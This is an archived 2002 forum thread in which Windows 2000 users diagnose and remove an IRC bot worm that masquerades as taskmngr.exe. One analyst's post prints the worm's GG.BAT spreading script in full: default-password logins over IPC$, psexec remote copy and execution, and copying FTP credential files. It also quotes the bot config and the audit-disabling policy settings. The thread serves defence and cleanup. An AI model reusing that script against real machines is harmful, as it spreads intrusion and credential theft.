Newbie dot Org HomePage
Visit one of our web buddies
taskmngr.exe
guest

08/26/02
in my winnt/system32/taskmngr.exe is there such a file in windows 2000? its really screwed up coz taskmngr.exe is on my startup and its a mirc appz with a mirc icon. i know there should be a taskmgr.exe file but if u have windows 2000 and u have a taskmngr.exe please give it to me
Jeff Yette

08/27/02
I think this is a new virus (worm) that really screws with your security settings ... Norton has no information on it. But if you check the creation date of the file ... it's probably very new. My computer is infected with it and I'm trying to find more info myself.
Orion

08/27/02
I'm running NAV with the most current defs. I got a warning that the ircmimic virus was found in the file win32.dll (NOT a part of Windows2000. More info on ircmimic: http://securityresponse.symantec.com/avcenter/venc/data/irc.mimic.html). NAV quarantined this file. I deleted it, and a subsequent virus scan found no more viruses. I rebooted and got the mirc app you mentioned. In the registry I found this taskmngr.exe file now set to run everytime I booted. Needless to say I deleted taskmngr.exe and the registry entry.
Ryan Wahlquist

08/28/02
Orion- what was the reg entry you found. I have found nothing on Symantec.com on this Virus. Could ya share with me please? Am at a loss for what the heck this is. However I think you guys should check for the following 2 files on your HD also found in system32..NT32.INI and dll32nt.hlp. Can't find anything on them as to if they are also a part of the virus. But we have 2000 at work and they are on none of those machines.
Nathan Ellis

08/28/02
Found the same file(taskmngr.exe) on a user system I'm trying to repair. The only things recently installed were Quicktime 6.0 and Webshots Daily Photo. The file opens what appears to be a Mirc registration window. Symantec states that while the file does not appear to contain maliscious code, the program could be used for destructive purposes. You need to open regedit.exe(registry editor), go to Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run and locate an entry for run32dll that accesses c:\winnt\system32\taskmngr.exe Delete the entry and the file and you should be okay.
Nathan Ellis

08/28/02
Ryan,

Good job! This is an IRC Trojan that uses Mirc as it's engine. dll32nt.hlp is the actual virus. Delete the files and update your virus definition files.

Dear Nathan Ellis,

We have analyzed your submission. The following is a report of our findings for each file you have submitted:

filename: E:\Documents and Settings\nellis\Desktop\nt32.ini
machine:
result: See the developer notes

filename: E:\Documents and Settings\nellis\Desktop\DLL32NT.HLP
machine:
result: This file is infected with IRC Trojan

filename: E:\Documents and Settings\nellis\Desktop\TASKMNGR.EXE
machine:
result: See the developer notes

Developer notes:
E:\Documents and Settings\nellis\Desktop\nt32.ini does not appear to contain malicious code. E:\Documents and Settings\nellis\Desktop\DLL32NT.HLP is non-repairable threat. It is detected by NAV after an update using the attached definition updater. Please delete this file and replace it if neccessary. E:\Documents and Settings\nellis\Desktop\TASKMNGR.EXE contains no malicious code although it can be used for malicious purposes. It is safe to delete this file.

The attached file is a self extracting zip containing updated virus definitions for Norton AntiVirus to successfully detect and repair
this virus.

Should you have any questions about your submission, please contact
your regional technical support from the Symantec website and give them
the tracking number in the subject of this message.

--
This message was generated by Symantec Security Response automation.

For USA:
For electronic support options, Symantec provides On-Line Services at
http://www.symantec.com/techsupp/

--

Ryan Wahlquist

08/28/02
Cool. Thanks Nathan. I too am an admin for a company and this has been driving me nuts for 24 hrs. Thanks for the confirmation.

Ryan

Carol

08/29/02
FYI - I have also been infected by the IRC Trogan virus.

Although, the symptoms I experienced were the following...some windows when opened would throw this error "HideWindow - Error, Window Not Found!". The windows receiving the error were when I opened Internet Explorer, Search - Help, Windows Explorer, Add/Remove Programs, and My Documents or when any website opened a new window.

In addition, I saw on a Microsoft developers newsgroup that others are affected and were receiving the same error as myself "HideWindows-Error" - none of the people, of course, realized this was the result of a virus.

Three other symptoms that I experienced: 1) a very, very tiny "MIRC" icon displayed on bootup and quickly disappeared, 2) a command window appeared during bootup in my active apps very briefly 'secedit.exe' - and found the sec*.bat file which was starting the command, 3) everytime I shutdown my machine, taskmngr.exe would popup for 'end task' - of course, I thought this was really Task Manager until scanning hardrive and finding the MIRC-Taskmngr.exe.

Question - any idea yet as to how this virus spreads? and exactly what damages it causes?

thx

David

08/30/02
On one of my clients machines it enabled the guest account and added it to the admin group.
Erez

08/30/02
We had the same virus and it messes up your security settings specifically your local security group permission on your network. You will need to re-add the Domain users or authenticated users to the local users group of that machine. Also the virus uses your machine as a Bot to further spread the various utilizing your bandwidth. Called Microsoft and they assured me it is the Tojan IRC virus. They claim that it is spread via various chat programs.
They are still trying to figure this one out.
I will let you know as soon as I have more information.
guest

08/30/02
after reading this im very worried what should i do with my taskmngr.exe my virus scan says its not a virus i already took it off of my startup how can i clean it? and i want to know how i got it i dont use any irc programs so why do i have it, if u want the file to dissect it to search for virus feel free to ask me for the file and any other file u wish dissect that is linked to taskmngr.exe, and pls give me info on how to clean the virus
guest

08/30/02
ur right this virus uses ur computer to go on irc server and attack and flood channels basiclly it uses YOU to connect on to a server and making ur computer type messages to the channel go to c:/winnt/system32/NT32.ini find the irc server the one on my computer was alive.stupidsic.com:6667 basiclly its like a sub 7 flood, yes sub 7 the trojan
these are the files
[afiles]
n0=nt32.ini
[rfiles]
n0=nt32.ini
n1=nt16.ini
n2=nt32.ini
n3=dll32nt.hlp
n4=xvpll.hlp
n5=httpsearch.ini
read the nt16 it tells u the server and the chan u have joined maybe u can find some info on the attacker
guest

08/30/02
i think ur pc should be clean after u delete those files in ur winnt/system32 file and also delete the startup key in ur regedit
DJ

08/30/02
Found this one on a win2000 server. I've installed mozilla and quicktime recently.
Aside from removing taskmngr.exe from startup other programs I have moved to a separate dir to be safe for now since these were all new file creations in the /system32/ are ocxdll.exe, omt.exe, mt.exe, MDM.scr, GG.bat( this bat looks for sites.dat and ws_ftp.inifrom your local machine, makes a copy and then passes itself off to taskmngr which is connecting to irc channels possibly uploading different files from your system).
I been using "netstat -an" to watch outgoing ip traffic and have only been seeing the 6667 port used.
Ken Bour
ken.bour@verizon.net
09/01/02
I got hit with this Trojan also. Incidentally, I also has recently installed QuickTime. I wonder if there is a connection? Anyway, Norton was running and was up-to-date, but it only detected the IRC Trojan during a routine scan. It quarantined a number of files (eg. v.exe, mt.exe, et al.); however, as others has mentioned, there is more to do: (1) remove taskmngr.exe (also in registry) (2) search WINNT\system32 for any files CREATED on 8/19/02 (I'm not 100% sure of this, but there were a bunch of them including: ocxdll.exe, mdm.scr, gates.txt, kill.exe, mdm.exe, mdm.scr, gg.bat, ncp.exe, ocxdll.exe, psexec.exe,secedit.sdb, gates.txt, dll16.ini). I put them in a separate folder just in case one or more are needed; (3) find all occurrences of MIRC in the Registry and delete them (one couldn't be deleted -- I may have to reboot to get that last one out).
aladin
aladin168@hotmail.com
09/04/02
More Analysis on ocxdll.exe virus:

++
This is a trojan using SMB over TCP attack, using port 445. It looked for vulnerability in weak administrator id and passwords on the local Windows 2000 systems.
++

One of my clients also got infected with ocxdll.exe virus. This occurred back in 8/28/2002 at 3am. After some detailed analysis, I have determined that it was a Trojan, deleted the detected registry entries, delete the infected files, tighten the administrator ID and password, restored the security policy by running "secedit.exe /configure" (from Microsoft) to restore the security policy (If they have a backup .sdb file, then just reapply the security policy would fix this part), add users back to local. The cause is bad security (admin ID and passwords), and a backdoor to drop the ocxdll.exe.

Effected systems:
++
- Windows 2000. Security policies alteration was ONLY for Windows 2000
- Windows NT - might be infected, but will not distribute or change security policies.

What did it do?
++
1. hide all programs it ran.
2. open backdoor, port 60609
3. Run mIRC client with random usernames listed in mdm.scr with more random characters
4. It ran the bot (robot) scripts in the following order, which means they contained malicious automated instructions.

[rfiles]
n0=nt32.ini
n1=dll16.ini
n2=nt32.ini
n3=dll32nt.hlp
n4=xvpll.hlp
n5=dll32.hlp
n6=httpsearch.ini.

5. Replace security policy settings using Microsoft security editor (SecEdit.exe /configure) command and reset the security policy to default settings, and replace security settings in the TFT8675. This is done in quiet mode.
6. It scans for 20 IP's and then start running "GG.BAT", which is the real program that started the hacking.
7. It tries to hack into the system using the following user ID and password. If you don't have these user id and passwords, maybe you are just infected with 1 system, and it could not spread via this Trojan/worm.
a. "administrator" with NO password
b. "administrator" with "administrator" password
c. "root" with "root" password
d. "admin" with "admin" password
8. If you have some guessable administrator id and passwords, then probably these systems were hacked successfully. It copied the Trojan OCXDLL.EXE to the compromised systems. If file were there, copy it anyway, and do it quietly. (using psexec.exe -c -f -d)
9. Run the OCXDLL.EXE without any delay (psexec.exe -d), which extracted the 17 files that are in this self-extracted file.
10. It tries to copy "c:\progra~1\flashfxp\sites.dat" and "c:\progra~1\ws_ftp\ws_ftp.ini" to "c:\windows\system32" directory. (maybe get the configuration from the bot?)
11. Start the "taskmngr.exe" which was really a Mirc.EXE, an irc client.
12. The scripts were kicked in to HIDE the mirc window, so you can ONLY see it in the process. You will see "taskmngr.exe" (NOT taskmgr.exe, which is the REAL task manager)
13. xvpll.hlp reports Trojan status back to the hacker. Either attempt failed or attempt successful.
++
Disclaimer: The irc bot scripts have not fully analyzed. This is what I understood so far. The removal instructions WILL remove the trojan.
++

Impact:
++
This may be a random attack. However, there is a file, ncp.exe involved, which is the NetCat program. This program allows the hackers to gain full control to your system. Therefore,
1. Best-case scenario is that it was a hack, and no sensitive data were lost.
2. Worst-case scenario is that they have controlled your system and implemented something new that are not yet detected.
3. The hacker has captured your IP address and knows that you were vulnerable because the Trojan actually reported back to him/her.
++

How to remove the Trojan:
++
1. Delete files that were extracted from ocxdll.exe, plus ocxdll.exe and dll16.ini (created when running mirc.exe)

Ocxdll.exe
Dll16.ini
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat (bat file to hack and copy Trojans)
httpsearch.ini (might show up as httpsear.ini due to 8.3 file format)
kill.exe (to kill process)
mdm.exe (to hide window program)
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp

**
**NOTE:
seced.bat is a decoy. This file was never used. The real instruction for updating the configuration was mentioned in item #5.
v.exe is actually srvany.exe, which is another decoy. It was never used.

**

2. Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run, remove "taskmngr.exe" (this starts mirc client program during the windows startup)
3. Change the LOCAL Administrator password on ALL Systems! Make sure they are strong passwords! Use mix of Uppercase, Lowercase, numbers, and non-alphanumeric, i.e. _,+,=,), ...
4. If possible, change Administrator login ID to a different user_id. This will stop the initial user_id guessing. (This will not stop the more sophisticated hackers)
5. Restore the default security policy settings by typing "secedit /configure C:\WINNT\security\Database\ secedit.sdb"
6. Goto start -> programs -> administrative tools -> Local Security Policy, click on "User Rights Assignments", and add users and groups back into the policy. "Access this computer from the network". The default setting is:
a. IWAM_[SYSTEM_NAME]
b. ADMINISTRATORS
c. BACKUP OPERATORS
d. POWER USERS
e. USERS
f. EVERYONE
g. IUSR_[ SYSTEM_NAME]

Additional Recommendation:
--
1. Tighten your Firewall and ANY all unwanted traffic from accessing ports, BOTH inside to outside, and outside to inside.
2. Rename your administrator user id to something else, and create a user id called "Administrator" with NO GROUPS. This will allow you to monitor anyone trying to use the "Administrator" login.
3. Setup security log, at minimum, log successful and failed Logon/Logoff., and monitor the event logs.
++

More details:
Infection:
registry entries
- Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run, remove "taskmngr.exe" (this starts mirc client program during the windows startup)

When MIRC client started running, it runs the scripts in dll32nt.hlp, which in fact ran "secedit /configure /DB secedit.sdb /cfg $mircdir $+ tftp8675 /quiet". This meant "configure your system setting with the default security policy, plus the additional settings in tftp8675". It basically removed many security restrictions, remove all audits for the systems, and of course remove all users in the "Local Users allowed from the net".
List from TFTP8675:
--
MinimumPasswordAge = 0
MaximumPasswordAge = 42
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ClearTextPassword = 0
[Event Audit]
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
--

OCXDLL.EXE is a self-extracted file that included 17 files. It is a Trojan and it's a worm. In the dll32nt.hlp, it has an instruction to do IP scan, and store the 20 IP address it found. Mostly likely it scanned the subnet and file server that were connected to the victim systems at that time. Then it has an instruction at the end to run GG.BAT, which is the instruction to attack the 20 IP's that just found.

Here are the files that were extracted from ocxdll.exe:
++
ocxdll.exe
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat
httpsearch.ini
kill.exe
mdm.exe
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp
++

Here is the GG.BAT text:
--
@echo off
net use /del \\%1\ipc$
net use \\%1\ipc$ "" /user:administrator
net use \\%1\ipc$ "administrator" /user:administrator
net use \\%1\ipc$ "root" /user:root
net use \\%1\ipc$ "admin" /user:admin
psexec \\%1 attrib.exe -r ocxdll.exe
psexec \\%1 -d kill.exe temp.exe
psexec \\%1 -f -c -d ocxdll.exe -o
psexec \\%1 -d ocxdll.exe -o
psexec \\%1 cmd.exe /c copy c:\progra~1\flashfxp\sites.dat c:\winnt\system32\w%1.dat
psexec \\%1 -d taskmngr.exe
psexec \\%1 cmd.exe /c copy c:\progra~1\ws_ftp\ws_ftp.ini c:\winnt\system32\w%1.ini
psexec \\%1 -d taskmngr.exe
--

--
from SysInternals, here is the description of what the PSEXEC parameters do:
-c = Copy the specified program to the remote system for execution. If you omit this option then the application must be in the system's path on the remote system.
-f = Copy the specified program to the remote system even if the file already exists on the remote system.
-d = Don't wait for application to terminate. Only use this option for non-interactive applications.
--

aladin
aladin168@hotmail.com
09/05/02
Correction on steps to restore to the default Microsoft security template. The following steps are from Edward Alfert (edward@alfert.com)
on the Usenet, topic "Solution to mIRC and Secedit Virus Networking Problems." in microsoft.public.scripting.virus.discussion. These steps will bring you back to the original Microsoft default template, but you MUST go through them and make sure proper access were not modified. You or some of your applications might have specific rights settings prior to the compromise, and the user/group privilage/rights need to be reset if necessary.

You probably have seen a strange user with weird SID that was added by the trojan in the "Logon Locally" policy. Remove the user. The SID there does NOT mean the trojan created a user. It was in the security template on TFTP8675 file.

Here is the steps to restore the original default microsoft template from Edward Alfert
==
NOW THE FUN PART..

1) use the backup security database template to restore the system to its
original microsoft defaults. (NOTE...if you upgrade from a previous OS,
this default may not be the default you are used to)...

cd %windir%\security\templates

Secedit /configure /cfg basicwk.inf /db basicwk.sdb /log basicwk.log
/verbose

2) copy /winnt/security/database/secedit.sdb to
/winnt/security/database/secedit-check.sdb

you need to do this because you can't run step #3 against the original
secedit.sdb

3) click on start, run, type mmc and click ok

4) click Console menu, then Add/Remove Snap-In

5) click Add, then double click on "Security and Configuration Analysis" and
"Security Templates", then click close, and ok.

6) right click on "security and configuration analysis" and click on "open
database"... browse to /winnt/security/database/secedit-check.sdb and
select it.

7) right click on "security and configuration analysis" and seclect
"analyzie computer now"

8) browse throught the directory structure and you will see that the
computer is currently configured differently..

Make changes as appropriate for your environment.

For example, a very important option that is probably missing (as caused by
the trojan) is that nobody is allowed to logon to the computer via the
network).

go to "security and configuration analisys"... then "local policy"... then
"user rights assignment"...

The first line... "Access this computer from the network" doesn list any
user or group!... this is definitely NOT the default... the default is to
include the following "Backup Operators, Power users, users,
administrators, everyone"..

Add these, and everything should now be fixed with "workgroup" networking.

If you have any questions, or need further help, reply to this thread
instead of the others... I will be monitoring this thread...
==

Damien
onepercent@eudoramail.com
09/05/02
I read in wired today that tasmngr.exe IS a backdoor. MS issued a vague warning about it. It is running on my machine also. I am going to do a little more investigating before I alter anything.
Eschient

09/06/02
Possible source?
Just a little information that I'm wondering about. I ran a scan of all the files I have had "added" to my computer since the earliest date on the files listed {8/10}. I have found the following programs were the only ones installed :

NVIDIA - New video card installed
Putty - New shell application
Maxis - Sims and Sims Vacation
Adobe - Acrobat Reader
Norton - New Virus Definitions
Microsoft Games - Zone files for Asheron's Call
Microsoft Games - .exe for Asheron's Call 2 Beta
1.0 - A folder containing a hell of a lot of files for Microsoft's "Cubis".

The only thing that raises my eyebrow is the 1.0 file. It contains over 200 various small files and 2 zips, including "cubis.jar-4c1275de-16bce078" and "GroopzApplet.jar-66d0be0a-30a89ef9". After unzipping GroopzApplet.jar-66d0be0a-30a89ef9, I found a 3rd zip, "GroopzApplet.jar-77e7758b-2746df5d".

So, I did a little search and found that this Groopz thing is toted as :

you can take your web site visitors on guided tours by "pushing" web pages to your visitor’s browser with the Groopz Operator program. You can simultaneously chat and push pages, making the live tours truly interactive, personal, and effective.

You can also push any web-accessible file, including sounds/MP3s, pictures, MS Word documents, PDF documents, and ZIP files.

Which means it would be perfect for, oh, I don't know, pushing huge files, mp3s, images and the like into say, an IRC channel.

Kyle Lai
aladin168@hotmail.com
09/07/02
I highly recommend everyone to run Anti-Trojan in addition to the virus scan program. Antivirus programs don't pick up some of the trojans, plus some tools that could be used by hackers. There are several products out there, i.e. Anti-trojan, Past Patrol. The one I use is anti-trojan. You can get it from http://www.anti-trojan.net.
Run this and you can be sure if there's any unwanted stuff on your system.

In addition, there might be some adware that was installed on your system when you surf the web. You want to make sure you get rid of these adwares because it might open ports on your system and send info on your system back to the vendors. You can detect these adware by using another tool called ad-aware. You can download the tool from http://www.lavasoftusa.com/

Hope this helps.

Kyle Lai, CISSP, CISA, MCSE
aladin168@hotmail.com

steve
cheequan@yahoo.com
09/10/02
Aladin, on your post dated 09/05/02 on how to restore the default Microsoft secuirty template, for step 1: ...

Secedit /configure /cfg basicwk.inf /db basicwk.sdb /log basicwk.log
/verbose

... I get this message after the process is done:

"Task is completed. Some files in the configuration are not found on thsi system so security cannot be set/queried. It's ok to ignore. See log C:\WINNT\SECURITY\TEMPLA~`\basicwk.log for detail info."

(btw, basicwk.log is 628KB, so I'm not sure what to look for in there... ^^;;)

And then, when I get to step 6:

6) right click on "security and configuration analysis" and click on "open
database"... browse to /winnt/security/database/secedit-check.sdb and
select it.

I can't find secedit-check.sdb. (I do find secedit.sdb though). Even if I do a search on all my drives I still can't find secedit-check.sdb. I'm guessing the error message from step 1 has something to do with it. Well, any suggestions? ^_^

Thanks~
steve

Kyle Lai
aladin168@hotmail.com
09/12/02
Steve,
It's actually in Step2 of the instructions. Make sure you copied the file and named it "secedit-check.sdb ".

I did posted the updated part 1 of the analysis, and a follow-up:
Part 1:
http://groups.google.com/groups?q=solution+irc+virus&hl=zh-TW&lr=&ie=UTF-8&oe=UTF-8&selm=bf0f8e77.0209050049.24860609%40posting.google.com&rnum=4

Part 2:
http://groups.google.com/groups?dq=&start=25&hl=en&lr=&ie=UTF-8&oe=UTF-8&group=microsoft.public.scripting.virus.discussion&selm=bf0f8e77.0209080706.7f395b0c%40posting.google.com

I like to stress that the Permission/Rights settings are more critical if your servers were infected. Make sure you RESET proper rights to the users, groups so systems, backups, other applications will run properly. If not possible, or if your system is working weird, I suggest re-building the server because you don't want to take any chances, especially if it's a critical system.

Here is the latest update:
1. I did not see any Anti-virus software vendor posting any alert, or give a name to this virus/trojan/malware, but they did identify some, but not all of these files in their later virus definition files.

2. Microsoft posted their analysis on the Microsoft Knowledge Base Article - Q328691, but info is not all correct. This is in the part 2 of my analysis.

3. One Microsoft PSS Security Specialist contacted me via email after reading the part 2 of my analysis, and I gave them a copy of the trojan/virus I analyzed. I have not heard back from him for the last couple days. Due to the scope of the infection, I hope they release some type of recommendation and/or alert to everyone that were infected because this trojan involved many 3rd party tools, hacker programs, and possibly a distributed Denial of Service program.

If possible, please send me an email at aladin168@hotmail.com and I like to do a quick survey to kind of identify the scope of this outbreak. All responses will remain anonymous. I promise. If you are not comfortable, please reply anonymously in this discussion group.

Thanks so much for you input.

Survey:
++
What's your infected Operating System?
What Service Packs were installed (if any)?
What's the time of the infection (approximate)?
What actions have you taken?
Did you reset the password for your administrator accounts?
Did you ever see ocxdll.exe as an infected file?
Did you ever see ncp.exe? If not, can you please do a search? It's a hacker's program.
Did you ever see mt.exe? A possible dDos client.
What Anti-virus software do you use, and did it identified irc/flood trojans?
Did you see the virus coming back and alarmed by your Anti-virus program?
++

Again, this trojan did spread by itself. The only protection is to re-set the administrator password to something hard to guess. If there is still a trojan out there that has not yet being removed, it will still actively find vulnerable systems to hack itself in.

I won't be surprised if there is a variant of this trojan in the future, so make sure you do some type of security assessment.

Additional Recommendation:
shields-up (https://grc.com/x/ne.dll?bh0bkyd2) is the most basic test you can do to test your network connection to the Internet. Go to that website and click on "Probe my ports" and it will give you some valuable results. If Shields-up test results showany open ports on your system, then you better install a FREE firewall like zone alarm (www.zonealarm.com) then go to Shields-up site and test it again. Unless you block the traffic from coming in, you are still vulnerable.

/Kyle
Kyle Lai Consulting
www.kylelai.com
aladin168@hotmail.com

Pam

09/20/02
I want to thank all of you for the information you have presented in the "rude" attack from the hackers...I was attacked also by the mirc "stuff"...I didnt know there were programs out there which "sniff" out the little worms which lurk inside your computer. You all provided links and information to fight back. The hide window error was the most irratating I have ever seen. I downloaded the worm software where the little trojan horse spins around and it located 3 of the worms. I was not happy with that program because it kept bringing up my windows installer program. The last scan I ran using that software indicated I did not have any trace of worms. I knew there had to be another one out there. I kept seaching and found a freeware program called Swat It. This program found the other worm, hide window error, and removed it. So, far, everything now is working with no errors. I am operating Win2000 and have a cable modem. I was attacked sometime around the middle of August. Thank you all again for helping me learn more about worms and such.
Eivind

09/22/02
I've spent the last 24 hrs trying to get rid of this worm.

The most disturbing thing is that I found a file called psXXX.XXX.XXX.XXX.txt (X - is my IP no) with approx the same time and date, and in the same directory, as the other modified files.

This file contained my mail address and password, the URL and user name for my internet bank account and various other login info.

Does anyone else have this file? If it's linked to the worm, then whoever planted it, may also have this information.

Someone mentioned QuickTime, I've also just recently installed QuickTime.

Frank

09/22/02
I strongly recommend that after a worm or virus infection you take the precautions of changing all of your login information.

That means talking with your ISP and changing your connection password.

That means changing the password for your online banking, your password for Paypal, and any other online services you care about.

The information you mentioned should never under normal circumstances be placed in a single file. That was collected by some program. It may or may not have been uploaded to the web by the worm.

You should be cautious and change those passwords.

Kyle Lai
kyle@kylelai.com
09/24/02
I agree.

Besides changing all of the passwords on all of your accounts, make sure you change the Windows Administrator account to something that's hard to guess.

Besides that, here are 4 FREE software that will help you fight the Trojan and intrusions. Make sure you get the latest update regularly:

1. Make sure you have the latest Anti-Virus definitions that downloaded from your anti-virus software vendor. If you don't have one, here is a free one: http://www.grisoft.com

2. Make sure you get an Anti-Trojan software on top of the Anti-Virus software. Many Anti-Virus software does not detect Trojans and Hacker software that was installed during an intrusions. Anti-Virus software does not detect hacker software because it could be used ligitimately by security professionals... A free and Great one is Swat-IT by Lockdown Corp: http://lockdowncorp.com/bots/downloadswatit.html

3. Get Ad-Aware software, which is for removing the advertising software that web advertisers installed on your systems without your acknoledgement just by surfing on the Web... This is a free software too: http://www.ad-aware.com

4. Get a Firewall for your computers if you have not get one. Here is a very simple to use FREE firewall software: http://www.zonealarm.com

Good luck!

Kyle Lai Consulting
www.kylelai.com
kyle@kylelai.com

Ingrid
gritje10@hotmail.com
10/01/02
if your pc gives by closing down the system
the error :Hidewindow-error does it means that you have a virus ??We scanned the whol pc with
norton antivirus 2002 and a online virusscanner.
And find notting.But the error still contains.
The same time when we are starting internet explorer we get message : kernel32dll close down.
please help us
tadayon
mehditadayon_iut@yahoo.com
10/02/02
mdm.exe
this virus has been hang my pc and i can't do anything unless reset by case bottom.
please guide me for clean this virus,
thank you,
mehdi tadayon.
Tina

10/07/02
My Irc Trojan came in on September 20, 02 and the only thing that I did was run Windows update hmm.
Paul

10/07/02
I had also recently installed quicktime. i had many of the files that you specified, but not all. my gg.bat file was called backup.bat. there was another file called pstor.exe which was from around the same time. i'm know i hadn't installed anything, so i got rid of it as well.
phil

10/08/02
Tftp8675! Does the 8675 represent a port? Does this virus try to set up your computer as an Tftp server? What is wrong with these people?
Theresa
tree101457@adelphia.net
10/09/02
I had gotten the Trojan.Irc Bounce virus by downloading a song on winmix i believe. I had scanned after deleting the song and found no more virus, then today after getting the computer back from the shop found the virus was now in my C\WINNT\system32\nt32.ini file.. I am running windows2000 pro my question is, i deleted the file since it was non repairable. i also followed the keys in regedit but found no taskmnger files. does this mean i got rid of the virus and all the problems related to it?And also will my machine run ok without this file? This operating system is totally new to me so I'm not real sure what to do now.
Thanks
Brian
brian.stensrud@telusmobility.com
10/10/02
I didn't have all the files mentioned in previous posts (did have some of them).
Please also look for :
=adobes.exe
=abc.dll
=abc2.dll
=abcd.jpg
=moo.dll
=remote.ini
=abc.bat
These all had references to:
=looking for / using accounts/passwords
=MIRC
=bizarre (foul even) language in the .INI file (also a reference to a site that I also saw when "mIRC" launched itself on boot.

All found (on my machine)at C:\WINNT\system32\shell. Found by luck when searching for some of the files listed by others.

Brian

10/10/02
... ooops - forgot to mention "adobea.exe" as well as "adobes.exe" - these 2 are actually listed as mirc (check properties).
Brian
brian.stensrud@telusmobility.com
10/11/02
I finally got rid of it for good (I think). The file "adobea.exe" would reappear every time I deleted it. It would then recreate abc2.dll. I downloaded the free firewall mentioned in a previous post (http://www.zonealarm.com) and after updating my registry, etc. etc., and setting the firewall on, I then tried to delete "adobea.exe". Immediately on it's being deleted, the firewall informed me that it had blocked an incoming call from 64.90.175.100. This time "adobea.exe" did not get recreated -- coincidence ?? -- not likely from where I sit.
Anyways -- there's the IP of where I think the trouble might be .. I'm happy just to be done with it .. someone else may feel like following up ..
John
john@john-rayner.com
10/21/02
I just got this ugly virus/trojan over the weekend, and thanx to this forum I am pretty sure I got it all cleand out. I am still unsure how it got on my system as I had not downloaded anything. The only explanation I can come up with is some junk mail that I opened up within outlook express, that may have triggered a download of somesort. I am still baffled as I had not opened any files and didnt see a download. What also worries me the most is that at no time did NAV find anything wrong or find the virus itself in the .hlp file. Anti-Trojan definately did the business, as it found an open port that the trojan was running through and shut it down.

What I am not 100% sure about though is if I had fixed the secedit file correctly. I followed the instructions posted above, but I didnt see anything different from what was standing. All my auditing stuff was still set as disabled and something I had changed in the original secedit file was still standing, which should have been overwritten when I had imported the files using snap in, in the mmc program.

Any additional help on the secedit functionionality and manual edits that I can do would be appreicated. I am really not a pro in this security function, so not sure what I need to actually set.

Thanx again for this excellent thread.

John.

Nasrid
nasrid@mindspring.com
10/26/02
great info, just got a dos window up on my girlfriends computer with MT.EXE searched google and this is what i found, great thread! i was able to quickly identify this trojan and find the quite disturbing file with our IPs that had bank account numbers, logins for our internet games, and even my brand of ciggarettes! thanks for the tips all
djhouston

10/26/02
I have the "HideWindow - Error, Window Not Found!" currently showing on my system. In summary what should I do to clear this off. It is hanging the computer.

Dj

Vadim
vkoshkin@rogers.com
10/26/02
Great help. Thanks to all. Just had been alerted by my ISP regarding multiple scans / atacks originated from my IP during the time I was hundreeds miles from my PC (though it was on). Following ISP recommendations I installed MS security patch for W2000 Trojan detecting software from www.moosoft.com. But while rebooting machine I caught something like mIRC loging window with references to rpc.bsd. IP installationtorebooting PC Following ISP recommendation psXXX.XXX.XXX.XXX.txt
Vadim
vkoshkin@rogems.com
10/26/02
Just submitted by mistake incomplete message above. In my case I found nt32.ini, dll16.ini, etc, exactly as listed in aladin e-mail above. But I did not find anything like abc.. or adob..
I also found psXXX...(my IP) with list of accounts and passwords. Very disturbing...
Charles
charles@charlesj5.net
10/28/02
I also have been infected with this trojan and im running Swat-IT as we speak .. but i would just like to say thanx to everyone that has posted on here about this.. I have recently uninstalled Quicktime and then I got a notice from NAV that i have this virus.. it seams to only affect Java applets on the internet with the Window noT found error.. such as Runescape.com(a game). Well thanx again and we will see what Swat-It solves when its done(6%).
Charles
charles@charlesj5.net
10/28/02
well it took about 2 hours to scan(big harddrive) but it found exactly what i wanted .. and more..(3)
--
1.) GT Bot M HideWindow - C:\WINNT\system32\MDM.EXE

2.) Network Crack Wizard 99 - C:\WINNT\system32\NCP.EXE

3.) GT Bot M HideWindow - C:\WINNT\system32\WINHP32.EXE

--

ALL WHERE (CLEANED) and NOW EVERYTHING WORKS GREAT. Much thanx to all of yall

David
slimer@slimer.co.uk
10/29/02
I too would like to thank people for posting here, it has been invaluable. Thanks especially to Kyle.

I sourced my trojan to some games I downloaded from Kazaa for the kids, it was either a counting game or a compilation of five arcade games that were zipped up. i thought I took necessary precautions by checking them with my AV, but they did not show up at that time.

I also had the file ps**.***.***.txt

All it seemed to contact were my pop3 addresses
and email password (since changed). the odd thing was that one of the pop3 addresses were spelt wrong, exactly as I had spelt wrong when I first typed them in, rather than when the trojan installed. (Odd..) I assume from this that the file was not pulling information directly from Outlook but from an older file with my previous mistake.

I didn't get a Mirc logo or a hide window error, do I assume from the posts above that there are variants of the same trojan? If so, do all of the instructions that Kyle gave still apply?

Thank you AVG, Zonealarm and of course Kyle Lai.

David
slimer@slimer.co.uk
10/29/02
Also..

The dll16.ini file contained this..

n0=%server rpc.bsd.st
n1=%timeout 10
n2=%gnick.tmp kitskool
n3=%chan ###orlbe6###
n4=%pstor ps.txt
n5=%pass  broken !
n6=%pass8 hey there?
n7=%master ionix@ionix.users.undernet.org

the ps.txt file mentioned was empty.

David
slimer@slimer.co.uk
10/29/02
Further to above...

These files were to be deleted as per Kyles instructions :

Ocxdll.exe
Dll16.ini
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat (bat file to hack and copy Trojans)
httpsearch.ini (might show up as httpsear.ini due to 8.3 file format)
kill.exe (to kill process)
mdm.exe (to hide window program)
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp

My system does not contain:
gg.bat
httpsearch.ini or httpsear.ini
mdm.exe
mt.exe
ncp.exe
v.exe

I can only assume I have a variant. Was mine a cut down version or are these files there with alternate names? I have a copy of the ocxdll.exe if anyone wants to have it to check it. (I am not opening it!! :-) )

Kyle Lai
aladin168@hotmail.com
10/29/02
I haven't check this site for a while and I am surprised to a lot more people were effected by this trojan... Seems like ocxdll.exe has made another round of attacks...

David,
